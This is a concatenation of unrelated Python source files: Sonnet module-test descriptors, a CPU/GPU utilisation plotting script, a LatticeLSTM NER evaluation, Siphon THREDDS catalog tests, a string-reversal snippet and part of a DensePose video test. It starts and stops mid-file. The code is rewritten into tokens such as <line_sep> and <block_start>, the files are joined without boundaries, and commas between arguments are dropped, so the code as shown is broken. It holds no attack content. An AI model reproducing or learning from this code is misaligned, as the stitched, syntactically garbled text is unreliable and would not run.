0.9)) shape=(BATCH_SIZE 5)) ModuleDescriptor(name="nets.Cifar10ConvNet" create=<lambda>:Training(snt.nets.Cifar10ConvNet()) shape=(BATCH_SIZE 3 3 2)) ModuleDescriptor(name="nets.ResNet50" create=<lambda>:Training(snt.nets.ResNet([1 1 1 1] 4)) shape=(BATCH_SIZE 3 3 2)) ModuleDescriptor(name="nets.MLP" create=<lambda>:snt.nets.MLP([3 4 5]) shape=(BATCH_SIZE 3)) )<line_sep>RNN_CORES=(ModuleDescriptor(name="Conv1DLSTM" create=<lambda>:snt.Conv1DLSTM((2 2) 3 3) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="Conv2DLSTM" create=<lambda>:snt.Conv2DLSTM((2 2 2) 3 3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Conv3DLSTM" create=<lambda>:snt.Conv3DLSTM((2 2 2 2) 3 3) shape=(BATCH_SIZE 2 2 2 2)) ModuleDescriptor(name="GRU" create=<lambda>:snt.GRU(1) shape=(BATCH_SIZE 128)) ModuleDescriptor(name="LSTM" create=<lambda>:snt.LSTM(1) shape=(BATCH_SIZE 128)) ModuleDescriptor(name="VanillaRNN" create=<lambda>:snt.VanillaRNN(8) shape=(BATCH_SIZE 128)) )<line_sep>UNROLLED_RNN_CORES=(ModuleDescriptor(name="UnrolledLSTM" create=<lambda>:snt.UnrolledLSTM(1) shape=(BATCH_SIZE 1 128)) )<def_stmt>recurrent_factory create_core:Callable[[] snt.RNNCore] unroller <arrow>Callable[[] Recurrent]<block_start><return><lambda>:Recurrent(create_core() unroller)<block_end><def_stmt>unroll_descriptors descriptors unroller=<none><block_start>"""Returns `Recurrent` wrapped descriptors with the given unroller applied."""<line_sep>out=[]<for_stmt>name,create,shape,dtype descriptors<block_start><if_stmt>unroller<is><none><block_start>name="Recurrent({})".format(name)<block_end><else_stmt><block_start>name="Recurrent({}, {})".format(name unroller.__name__)<block_end>out.append(ModuleDescriptor(name=name create=recurrent_factory(create unroller) shape=shape dtype=dtype))<block_end><return>tuple(out)<block_end>RECURRENT_MODULES=(unroll_descriptors(RNN_CORES snt.dynamic_unroll)+unroll_descriptors(RNN_CORES snt.static_unroll)+unroll_descriptors(UNROLLED_RNN_CORES))<line_sep>OPTIMIZER_MODULES=(ModuleDescriptor(name="optimizers.Adam" create=<lambda>:snt.optimizers.Adam(learning_rate=0.1)) ModuleDescriptor(name="optimizers.Momentum" create=<lambda>:snt.optimizers.Momentum(learning_rate=0.1 momentum=.9)) ModuleDescriptor(name="optimizers.RMSProp" create=<lambda>:snt.optimizers.RMSProp(learning_rate=0.1)) ModuleDescriptor(name="optimizers.SGD" create=<lambda>:snt.optimizers.SGD(learning_rate=0.1)) )<line_sep>IGNORED_MODULES={# Stateless or abstract. snt.BatchApply snt.Deferred snt.Module snt.Optimizer snt.Reshape # Metrics. snt.ExponentialMovingAverage snt.Mean snt.Metric snt.Sum # Normalization. snt.BaseBatchNorm # Tested via `snt.BatchNorm`. # Recurrent. snt.DeepRNN snt.RNNCore snt.TrainableState snt.UnrolledRNN # Tested via `snt.nets.ResNet`. snt.nets.ResNet50 snt.nets.resnet.BottleNeckBlockV1 snt.nets.resnet.BottleNeckBlockV2 snt.nets.resnet.BlockGroup }<line_sep>
# /* Copyright (C) 2016 Ion Torrent Systems, Inc. All Rights Reserved */ <import_stmt>pandas<as>pd<import_stmt>datetime<import_stmt>dateutil<import_stmt>matplotlib.dates<as>dates<import_from_stmt>matplotlib pyplot<as>plt<import_stmt>numpy<as>np<import_from_stmt>time strptime<import_stmt>os<line_sep># put the date on the same line with the cpu data os.system("awk 'NR%2{printf \"%s \",$0;next;}1' cpu_util.log > cpu_data.log")<line_sep>df=pd.read_csv("cpu_data.log" names=["dow" "mon" "day" "time" "tz" "year" "lcpu" "us" "lus" "sy" "lsy" "ni" "lni" "id" "lid" "wa" "lwa" "hi" "lhi" "si" "lsi" "st" "lst" ] delim_whitespace=<true> header=<none> )<line_sep>data=list(df.T.to_dict().values())# export the data frame to a python dictionary x_axis=np.zeros(len(data) dtype="datetime64[s]")<line_sep>y_axis_idle=np.zeros(len(data))<line_sep>y_axis_idle_smoothed=np.zeros(len(data))<line_sep>y_axis_usr=np.zeros(len(data))<line_sep>y_axis_usr_smoothed=np.zeros(len(data))<line_sep>y_axis_nice=np.zeros(len(data))<line_sep>y_axis_nice_smoothed=np.zeros(len(data))<line_sep>y_axis_sys=np.zeros(len(data))<line_sep>y_axis_sys_smoothed=np.zeros(len(data))<line_sep>span=5<line_sep>span_gpu=10<for_stmt>key range(0 len(data))<block_start>month=str(strptime(data[key]["mon"] "%b").tm_mon).zfill(2)<line_sep>datekey=(str(data[key]["year"])+"-"+month+"-"+str(data[key]["day"])+"T"+data[key]["time"])<line_sep>x_axis[key]=np.datetime64(datekey)<line_sep>y_axis_idle[key]=int(data[key]["id"])<line_sep>y_axis_usr[key]=int(data[key]["us"])<line_sep>y_axis_nice[key]=int(data[key]["ni"])<line_sep>y_axis_sys[key]=int(data[key]["sy"])<block_end># now, read in the gpu data df=pd.read_csv("gpu_util.log" names=["systemtime" "percent"] sep="," parse_dates=[0])<line_sep># or:, infer_datetime_format=True) data2=list(df.T.to_dict().values())# export the data frame to a python dictionary x_axis_gpu=np.zeros(len(data2) dtype="datetime64[s]")<line_sep>y_axis_gpu=np.zeros(len(data))<line_sep>y_axis_gpu_smoothed=np.zeros(len(data))<for_stmt>key range(0 len(data))<block_start>x_axis_gpu[key]=np.datetime64((data2[key]["systemtime"]))<if_stmt>key<l>len(data2)<block_start>y_axis_gpu[key]=int((data2[key]["percent"].replace(" " "").replace("%" "")))<block_end><else_stmt><block_start>y_axis_gpu[key]=0<block_end><block_end># print x_axis[0] # print x_axis_gpu[0] # print x_axis[len(x_axis)-1] # print x_axis_gpu[len(x_axis_gpu)-1] # smooth the data <if_stmt>len(data)<g>span<block_start><for_stmt>key range(span len(data)-span)<block_start>sum_gpu=0<for_stmt>key2 range(key-span key+span)<block_start>sum_gpu<augadd>y_axis_gpu[key2]<block_end>y_axis_gpu_smoothed[key]=sum_gpu/(2<times>span)<block_end><for_stmt>key range(span len(data)-span)<block_start>sum_idle=sum_usr=sum_nice=sum_sys=0<for_stmt>key2 range(key-span key+span)<block_start>sum_idle<augadd>y_axis_idle[key2]<line_sep>sum_usr<augadd>y_axis_usr[key2]<line_sep>sum_nice<augadd>y_axis_nice[key2]<line_sep>sum_sys<augadd>y_axis_sys[key2]<block_end>y_axis_idle_smoothed[key]=sum_idle/(2<times>span)<line_sep>y_axis_usr_smoothed[key]=sum_usr/(2<times>span)<line_sep>y_axis_nice_smoothed[key]=sum_nice/(2<times>span)<line_sep>y_axis_sys_smoothed[key]=sum_sys/(2<times>span)<block_end><block_end>s=data<line_sep>wl=0.6<line_sep>fsz=8<line_sep>fig=plt.figure(figsize=(15 5))<line_sep>ax=plt.subplot(111)<line_sep>box=ax.get_position()<line_sep>ax.set_position([box.x0 box.y0 box.width<times>0.85 box.height])<for_stmt>item ax.get_xticklabels()+ax.get_yticklabels()<block_start>item.set_fontsize(fsz)<block_end># xstart, xend = ax.get_xlim() # xtickvals = # ax.xaxis.set_ticks(xtickvals) plt.plot(x_axis y_axis_usr "#be4b48" linewidth=wl label="% usr")<line_sep>plt.plot(x_axis y_axis_nice "#98b954" linewidth=wl label="% nice")<line_sep>plt.plot(x_axis y_axis_sys "#7d60a0" linewidth=wl label="% sys")<line_sep>plt.plot(x_axis y_axis_idle "#46aac5" linewidth=wl label="% idle")<line_sep>plt.plot(x_axis y_axis_gpu "#000000" linewidth=wl label="% gpu")<line_sep>plt.legend(loc="right" bbox_to_anchor=(1.25 0.5) fontsize=fsz)<line_sep>plt.savefig("oiaTimingRaw.png")<line_sep>plt.clf()<line_sep>wl=1.0<line_sep>ax=plt.subplot(111)<line_sep>box=ax.get_position()<line_sep>ax.set_position([box.x0 box.y0 box.width<times>0.85 box.height])<for_stmt>item ax.get_xticklabels()+ax.get_yticklabels()<block_start>item.set_fontsize(fsz)<block_end>plt.plot(x_axis y_axis_usr_smoothed "#be4b48" linewidth=wl label="% usr")<line_sep>plt.plot(x_axis y_axis_nice_smoothed "#98b954" linewidth=wl label="% nice")<line_sep>plt.plot(x_axis y_axis_sys_smoothed "#7d60a0" linewidth=wl label="% sys")<line_sep>plt.plot(x_axis y_axis_idle_smoothed "#46aac5" linewidth=wl label="% idle")<line_sep>plt.plot(x_axis y_axis_gpu_smoothed "#000000" linewidth=0.4 label="% gpu")<line_sep>plt.legend(loc="right" bbox_to_anchor=(1.25 0.5) fontsize=fsz)<line_sep>plt.savefig("oiaTiming.png")<line_sep>os.remove("cpu_data.log")<line_sep>
# -*- coding: utf-8 -*- <import_stmt>torch<import_from_stmt>model LatticeLSTM<import_from_stmt>load_data char2idx idx2char label2idx idx2label word2idx data_generator<line_sep>character_size=len(char2idx)<line_sep>word_size=len(word2idx)<line_sep>embed_dim=300<line_sep>hidden_dim=128<line_sep>TEST_DATA_PATH="./data/test_data"# 测试数据 device="cuda"<if>torch.cuda.is_available()<else>'cpu'<line_sep>model=LatticeLSTM(character_size word_size label2idx embed_dim hidden_dim).to(device)<line_sep>model.load_state_dict(torch.load("./saved_model/model_lattice.pth" map_location=device))<line_sep>model.eval()<def_stmt>extract chars tags<block_start>result=[]<line_sep>pre=''<line_sep>w=[]<for_stmt>idx,tag enumerate(tags)<block_start><if_stmt><not>pre<block_start><if_stmt>tag.startswith('B')<block_start>pre=tag.split('-')[1]<line_sep>w.append(chars[idx])<block_end><block_end><else_stmt><block_start><if_stmt>tag<eq>f'I-{pre}'<block_start>w.append(chars[idx])<block_end><else_stmt><block_start>result.append([w pre])<line_sep>w=[]<line_sep>pre=''<if_stmt>tag.startswith('B')<block_start>pre=tag.split('-')[1]<line_sep>w.append(chars[idx])<block_end><block_end><block_end><block_end><return>[[''.join(x[0]) x[1]]<for>x result]<block_end>gold_num=0<line_sep>predict_num=0<line_sep>correct_num=0<for_stmt>sent,input_ids,input_words,labels_idx data_generator(TEST_DATA_PATH char2idx word2idx label2idx)<block_start>print(f"Sent: {sent}")<line_sep>chars=[idx2char[ix]<for>ix input_ids]<line_sep>labels=[idx2label[ix]<for>ix labels_idx]<line_sep>entities=extract(chars labels)<line_sep>gold_num<augadd>len(entities)<line_sep>print(f'NER: {entities}')<line_sep>res=model(input_ids input_words)<line_sep>pred_labels=[idx2label[ix]<for>ix res[1]]<line_sep>pred_entities=extract(chars pred_labels)<line_sep>predict_num<augadd>len(pred_entities)<line_sep>print(f'Predicted NER: {pred_entities}')<line_sep>print('---------------\n')<for_stmt>pred pred_entities<block_start><if_stmt>pred<in>entities<block_start>correct_num<augadd>1<block_end><block_end><block_end>print(f'gold_num = {gold_num}')<line_sep>print(f'predict_num = {predict_num}')<line_sep>print(f'correct_num = {correct_num}')<line_sep>precision=correct_num/predict_num<line_sep>print(f'precision = {precision}')<line_sep>recall=correct_num/gold_num<line_sep>print(f'recall = {recall}')<line_sep>print(f'f1-score = {2<times>precision<times>recall/(precision+recall)}')<line_sep>
# Copyright (c) 2013-2019 Siphon Contributors. # Distributed under the terms of the BSD 3-Clause License. # SPDX-License-Identifier: BSD-3-Clause """Test the catalog access API."""<import_from_stmt>datetime datetime<import_stmt>logging<import_stmt>pytest<import_from_stmt>siphon.catalog get_latest_access_url TDSCatalog<import_from_stmt>siphon.testing get_recorder<line_sep>log=logging.getLogger('siphon.catalog')<line_sep>log.setLevel(logging.WARNING)<line_sep>recorder=get_recorder(__file__)<line_sep>@recorder.use_cassette('thredds-test-toplevel-catalog')<def_stmt>test_basic <block_start>"""Test of parsing a basic catalog."""<line_sep>url='http://thredds-test.unidata.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>'Forecast Model Data'<in>cat.catalog_refs<block_end>@recorder.use_cassette('thredds-test-toplevel-catalog')<def_stmt>test_catalog_representation <block_start>"""Test string representation of the catalog object."""<line_sep>url='http://thredds-test.unidata.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat)<eq>'Unidata THREDDS Data Server'<block_end>@recorder.use_cassette('thredds-test-toplevel-catalog')<def_stmt>test_catalog_session <block_start>"""Test of catalog session."""<line_sep>url='http://thredds-test.unidata.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>'Forecast Model Data'<in>cat.catalog_refs<line_sep># nothing is returned from the session close nor can you check it # but the ability to close is what is desired cat.session.close()<block_end>@recorder.use_cassette('thredds-test-latest-gfs-0p5')<def_stmt>test_access <block_start>"""Test catalog parsing of access methods."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/grib/'<concat>'NCEP/GFS/Global_0p5deg/latest.xml')<line_sep>cat=TDSCatalog(url)<line_sep>ds=list(cat.datasets.values())[0]<assert_stmt>'OPENDAP'<in>ds.access_urls<block_end>@recorder.use_cassette('thredds-test-default-5-0')<def_stmt>test_access_default_catalog <block_start>"""Test case-insensitive parsing of access methods in default catalog."""<line_sep>url=('http://localhost:8081/thredds/catalog/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>ds=list(cat.datasets.values())[0]<assert_stmt>'OPENDAP'<in>ds.access_urls<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_virtual_access <block_start>"""Test access of virtual datasets."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep># find the 2D time coordinate "full collection" dataset <for_stmt>dataset list(cat.datasets.values())<block_start><if_stmt>'Full Collection'<in>dataset.name<block_start>ds=dataset<line_sep><break><block_end><block_end><assert_stmt>'OPENDAP'<in>ds.access_urls<line_sep># TwoD is a virtual dataset, so HTTPServer # should not be listed here <assert_stmt>'HTTPServer'<not><in>ds.access_urls<block_end>@recorder.use_cassette('latest_rap_catalog')<def_stmt>test_get_latest <block_start>"""Test latest dataset helper function."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/'<concat>'grib/NCEP/RAP/CONUS_13km/catalog.xml')<line_sep>latest_url=get_latest_access_url(url 'OPENDAP')<assert_stmt>latest_url<block_end>@recorder.use_cassette('latest_rap_catalog')<def_stmt>test_latest_attribute <block_start>"""Test using the catalog latest attribute."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/'<concat>'grib/NCEP/RAP/CONUS_13km/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>cat.latest.name<eq>'RR_CONUS_13km_20150527_0100.grib2'<block_end>@recorder.use_cassette('top_level_cat')<def_stmt>test_tds_top_catalog <block_start>"""Test parsing top-level catalog."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>cat<block_end>@recorder.use_cassette('radar_dataset_cat')<def_stmt>test_simple_radar_cat <block_start>"""Test parsing of radar server catalog."""<line_sep>url='http://thredds.ucar.edu/thredds/radarServer/nexrad/level2/IDD/dataset.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>cat<block_end>@recorder.use_cassette('point_feature_dataset_xml')<def_stmt>test_simple_point_feature_collection_xml <block_start>"""Test accessing point feature top-level catalog."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/nws/metar/ncdecoded/catalog.xml'<concat>'?dataset=nws/metar/ncdecoded/Metar_Station_Data_fc.cdmr')<line_sep>cat=TDSCatalog(url)<assert_stmt>cat<block_end>@recorder.use_cassette('html_then_xml_catalog')<def_stmt>test_html_link recwarn<block_start>"""Test that we fall-back when given an HTML catalog page."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/'<concat>'grib/NCEP/RAP/CONUS_13km/catalog.html')<line_sep>TDSCatalog(url)<assert_stmt>'Changing'<in>str(recwarn.pop(UserWarning).message)<block_end>@recorder.use_cassette('follow_cat')<def_stmt>test_catalog_follow <block_start>"""Test catalog reference following."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>ref_name='Forecast Model Data'<line_sep>cat=TDSCatalog(url).catalog_refs[ref_name].follow()<assert_stmt>cat<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_order <block_start>"""Test that we properly order datasets parsed from the catalog."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>list(cat.datasets)<eq>['Full Collection (Reference / Forecast Time) Dataset' 'Best NAM CONUS 20km Time Series' 'Latest Collection for NAM CONUS 20km']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_get_by_index <block_start>"""Test that datasets can be accessed by index."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>cat.datasets[0].name<eq>'Full Collection (Reference / Forecast Time) Dataset'<assert_stmt>cat.datasets[1].name<eq>'Best NAM CONUS 20km Time Series'<assert_stmt>cat.datasets[2].name<eq>'Latest Collection for NAM CONUS 20km'<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_str <block_start>"""Test that datasets are printed as expected."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat.datasets)<eq>("['Full Collection (Reference / Forecast Time) Dataset', "<concat>"'Best NAM CONUS 20km Time Series', "<concat>"'Latest Collection for NAM CONUS 20km']")<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_sliced_str <block_start>"""Test that datasets are printed as expected when sliced."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat.datasets[-2:])<eq>('[Best NAM CONUS 20km Time Series, '<concat>'Latest Collection for NAM CONUS 20km]')<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_nearest_time <block_start>"""Test getting dataset by time using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>nearest=cat.catalog_refs.filter_time_nearest(datetime(2015 5 28 17))<assert_stmt>nearest.title<eq>'NAM_CONUS_20km_noaaport_20150528_1800.grib1'<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_nearest_time_30 <block_start>"""Test getting dataset by time; check for a day in the 30s (#gh-173)."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>nearest=cat.catalog_refs.filter_time_nearest(datetime(2015 5 30 11))<assert_stmt>nearest.title<eq>'NAM_CONUS_20km_noaaport_20150530_1200.grib1'<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_nearest_time_raises <block_start>"""Test getting dataset by time using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep># Datasets doesn't have any timed datasets <with_stmt>pytest.raises(ValueError)<block_start>cat.datasets.filter_time_nearest(datetime(2015 5 28 17))<block_end><block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range <block_start>"""Test getting datasets by time range using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0))<line_sep>titles=[item.title<for>item in_range]<assert_stmt>titles<eq>['NAM_CONUS_20km_noaaport_20150528_0000.grib1' 'NAM_CONUS_20km_noaaport_20150528_0600.grib1' 'NAM_CONUS_20km_noaaport_20150528_1200.grib1' 'NAM_CONUS_20km_noaaport_20150528_1800.grib1' 'NAM_CONUS_20km_noaaport_20150529_0000.grib1']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_bad_time_range <block_start>"""Test warning message for bad time range."""<with_stmt>pytest.warns(UserWarning)<block_start>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 29 0) datetime(2015 5 28 0))<assert_stmt>in_range<eq>[]<block_end><block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range_regex <block_start>"""Test getting datasets by time range using filenames, with manual regex."""<line_sep># This is DatasetCollection.default_regex, but tests passing it explicitly regex=(r'(?P<year>\d{4})(?P<month>[01]\d)(?P<day>[0123]\d)_'<concat>r'(?P<hour>[012]\d)(?P<minute>[0-5]\d)')<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0) regex=regex)<line_sep>titles=[item.title<for>item in_range]<assert_stmt>titles<eq>['NAM_CONUS_20km_noaaport_20150528_0000.grib1' 'NAM_CONUS_20km_noaaport_20150528_0600.grib1' 'NAM_CONUS_20km_noaaport_20150528_1200.grib1' 'NAM_CONUS_20km_noaaport_20150528_1800.grib1' 'NAM_CONUS_20km_noaaport_20150529_0000.grib1']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range_strptime <block_start>"""Test getting datasets by time range using filenames, with strptime."""<line_sep>regex=r'noaaport_(?P<strptime>\d{8}_\d{4})'<line_sep>strptime='%Y%m%d_%H%M'<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0) regex=regex strptime=strptime)<line_sep>titles=[item.title<for>item in_range]<assert_stmt>titles<eq>['NAM_CONUS_20km_noaaport_20150528_0000.grib1' 'NAM_CONUS_20km_noaaport_20150528_0600.grib1' 'NAM_CONUS_20km_noaaport_20150528_1200.grib1' 'NAM_CONUS_20km_noaaport_20150528_1800.grib1' 'NAM_CONUS_20km_noaaport_20150529_0000.grib1']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range_raises <block_start>"""Test getting datasets by time range using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep># No time-based dataset names <with_stmt>pytest.raises(ValueError)<block_start>cat.datasets.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0))<block_end><block_end>@recorder.use_cassette('top_level_cat')<def_stmt>test_catalog_ref_order <block_start>"""Test that catalog references are properly ordered."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>list(cat.catalog_refs)<eq>['Forecast Model Data' 'Forecast Products and Analyses' 'Observation Data' 'Radar Data' 'Satellite Data' 'Unidata case studies']<block_end>@recorder.use_cassette('cat_non_standard_context_path')<def_stmt>test_non_standard_context_path <block_start>"""Test accessing TDS with non-standard Context Path."""<line_sep>url='http://ereeftds.bom.gov.au/ereefs/tds/catalog/ereef/mwq/P1A/catalog.xml'<line_sep>cat=TDSCatalog(url)<line_sep>ds=cat.datasets['A20020101.P1A.ANN_MIM_RMP.nc']<line_sep>expected=('http://ereeftds.bom.gov.au/ereefs/tds/dodsC/ereef/mwq/'<concat>'P1A/A20020101.P1A.ANN_MIM_RMP.nc')<assert_stmt>ds.access_urls['OPENDAP']<eq>expected<block_end>@recorder.use_cassette('cat_access_elements')<def_stmt>test_access_elements <block_start>"""Test parsing access elements in TDS client catalog."""<line_sep>url='http://oceandata.sci.gsfc.nasa.gov/opendap/SeaWiFS/L3SMI/2001/001/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>len(list(cat.datasets))<ne>0<block_end>@recorder.use_cassette('cat_only_http')<def_stmt>test_simple_service_within_compound <block_start>"""Test parsing of a catalog that asks for a single service within a compound one."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/noaaport/text/'<concat>'tropical/atlantic/hdob/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>(cat.datasets[0].access_urls<eq>{'HTTPServer':'http://thredds-test.unidata.ucar.edu/thredds/'<concat>'fileServer/noaaport/text/tropical/atlantic/hdob/'<concat>'High_density_obs_20170824.txt'})<block_end>@recorder.use_cassette('rsmas_ramadda')<def_stmt>test_ramadda_catalog <block_start>"""Test parsing a catalog from RAMADDA."""<line_sep>url='http://weather.rsmas.miami.edu/repository?output=thredds.catalog'<line_sep>cat=TDSCatalog(url)<assert_stmt>len(cat.catalog_refs)<eq>12<block_end>@recorder.use_cassette('rsmas_ramadda_datasets')<def_stmt>test_ramadda_access_urls <block_start>"""Test creating access urls from a catalog from RAMADDA."""<line_sep>url='http://weather.rsmas.miami.edu/repository?output=thredds.catalog'<line_sep># Walk down a few levels to where we can get a dataset cat=(TDSCatalog(url).catalog_refs[0].follow().catalog_refs[0].follow().catalog_refs[0].follow())<line_sep>ds=cat.datasets[3]<assert_stmt>ds.access_urls['opendap']<eq>('http://weather.rsmas.miami.edu/repository/opendap/'<concat>'synth:a43c1cc4-1cf2-4365-97b9-6768b8201407:L3YyYl91c'<concat>'2VzRUNPQS9keW5hbW9fYmFzaWNfdjJiXzIwMTFhbGwubmM='<concat>'/entry.das')<block_end>@recorder.use_cassette('tds50_catalogref_follow')<def_stmt>test_tds50_catalogref_follow <block_start>"""Test following a catalog ref url on TDS 5."""<line_sep>cat=TDSCatalog('http://thredds-test.unidata.ucar.edu/thredds/catalog.xml')<assert_stmt>len(cat.catalog_refs[0].follow().catalog_refs)<eq>59<block_end>@recorder.use_cassette('top_level_cat')<def_stmt>test_catalog_ref_str <block_start>"""Test that catalog references are properly represented as strings."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat.catalog_refs[0])<eq>'Forecast Model Data'<block_end>@recorder.use_cassette('ncei_embedded_metadata')<def_stmt>test_catalog_with_embedded_metadata_elements <block_start>"""Test catalog with embedded metadata elements."""<line_sep>url='https://www.ncei.noaa.gov/thredds/catalog/namanl/201802/20180220/catalog.xml'<line_sep>cat=TDSCatalog(url)<line_sep>md=cat.metadata<assert_stmt>'external_metadata'<in>md<assert_stmt>'serviceName'<in>md<block_end>@recorder.use_cassette('latest_resolver_on_latest_dataset')<def_stmt>test_latest_resolver_fail <block_start>"""Test getting latest on catalog that does not have a resolver."""<line_sep>cat=TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GFS/'<concat>'Global_0p25deg_ana/latest.xml')<line_sep>latest=''<with_stmt>pytest.raises(AttributeError)<as>excinfo<block_start>latest=cat.latest<block_end><assert_stmt>latest<eq>''<assert_stmt>'"latest" not available for this catalog'<in>str(excinfo.value)<block_end>
a=input("Enter your string to reverse: \n")<line_sep>print(a[::-1])<line_sep>
# Copyright (c) Facebook, Inc. and its affiliates. <import_stmt>contextlib<import_stmt>os<import_stmt>random<import_stmt>tempfile<import_stmt>unittest<import_stmt>torch<import_stmt>torchvision.io<as>io<import_from_stmt>densepose.data.transform ImageResizeTransform<import_from_stmt>densepose.data.video RandomKFramesSelector VideoKeyframeDataset<try_stmt><block_start><import_stmt>av<block_end><except_stmt>ImportError<block_start>av=<none><block_end># copied from torchvision test/test_io.py <def_stmt>_create_video_frames num_frames height width<block_start>y,x=torch.meshgrid(torch.linspace(-2 2 height) torch.linspace(-2 2 width))<line_sep>data=[]<for_stmt>i range(num_frames)<block_start>xc=float(i)/num_frames<line_sep>yc=1-float(i)/(2<times>num_frames)<line_sep>d=torch.exp(-((x-xc)<power>2+(y-yc)<power>2)/2)<times>255<line_sep>data.append(d.unsqueeze(2).repeat(1 1 3).byte())<block_end><return>torch.stack(data 0)<block_end># adapted from torchvision test/test_io.py @contextlib.contextmanager<def_stmt>temp_video num_frames height width fps lossless=<false> video_codec=<none> options=<none><block_start><if_stmt>lossless<block_start><if_stmt>video_codec<is><not><none><block_start><raise>ValueError("video_codec can't be specified together with lossless")<block_end><if_stmt>options<is><not><none><block_start><raise>ValueError("options can't be specified together with lossless")<block_end>video_codec="libx264rgb"<line_sep>options={"crf":"0"}<block_end><if_stmt>video_codec<is><none><block_start>video_codec="libx264"<block_end><if_stmt>options<is><none><block_start>options={}<block_end>data=_create_video_frames(num_frames height width)<with_stmt>tempfile.NamedTemporaryFile(suffix=".mp4")<as>f<block_start>f.close()<line_sep>io.write_video(f.name data fps=fps video_codec=video_codec options=options)<line_sep><yield>f.name data<block_end>os.unlink(f.name)<block_end>@unittest.skipIf(av<is><none> "PyAV unavailable")<class_stmt>TestVideoKeyframeDataset(unittest.TestCase)<block_start><def_stmt>test_read_keyframes_all self<block_start><with_stmt>temp_video(60 300 300 5 